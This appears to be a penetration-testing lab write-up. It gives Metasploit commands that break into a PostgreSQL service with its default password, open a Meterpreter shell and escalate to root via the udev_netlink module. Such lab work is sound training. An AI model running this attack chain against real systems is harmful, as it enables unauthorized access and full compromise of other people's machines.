## https://sploitus.com/exploit?id=C33F4650-787E-5713-9CCF-8532DC8B2214
# ๐ Remote & Local Exploitation Lab
## ๐ Objective
Exploit a vulnerable PostgreSQL service on a Linux target (203.0.113.100), gain access using **Metasploit**, and escalate privileges to **root**.
---
## ๐ Tools Used
- **Nmap/Zenmap** โ Network scanning & enumeration
- **OpenVAS/Greenbone** โ Vulnerability scanning
- **Metasploit Framework** โ Exploitation & post-exploitation
- **Meterpreter** โ Interactive shell access
---
## ๐ Attack Flow
```bash
# 1. Scan the target for open ports
nmap 203.0.113.100
# 2. Run OpenVAS to detect vulnerabilities
/home/scripts/openvas_start
# 3. Exploit PostgreSQL with Metasploit
msfconsole
search postgres_login
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 203.0.113.100
run
# 4. Launch exploit and gain Meterpreter shell
use exploit/linux/postgres/postgres_payload
set RHOST 203.0.113.100
set PASSWORD postgres
exploit
# 5. Privilege Escalation
use exploit/linux/local/udev_netlink
set SESSION 1
exploit
whoami # root
```
---
## โ Outcome
- Successfully scanned, exploited, and escalated privileges.
- Learned the full pentest chain: **recon โ scanning โ exploitation โ privilege escalation**.
- Demonstrated how misconfigured services can lead to **root compromise**.
---
## ๐ Learning Takeaway
This lab reinforced how attackers move through the penetration testing cycle and why proactive testing is essential for securing systems.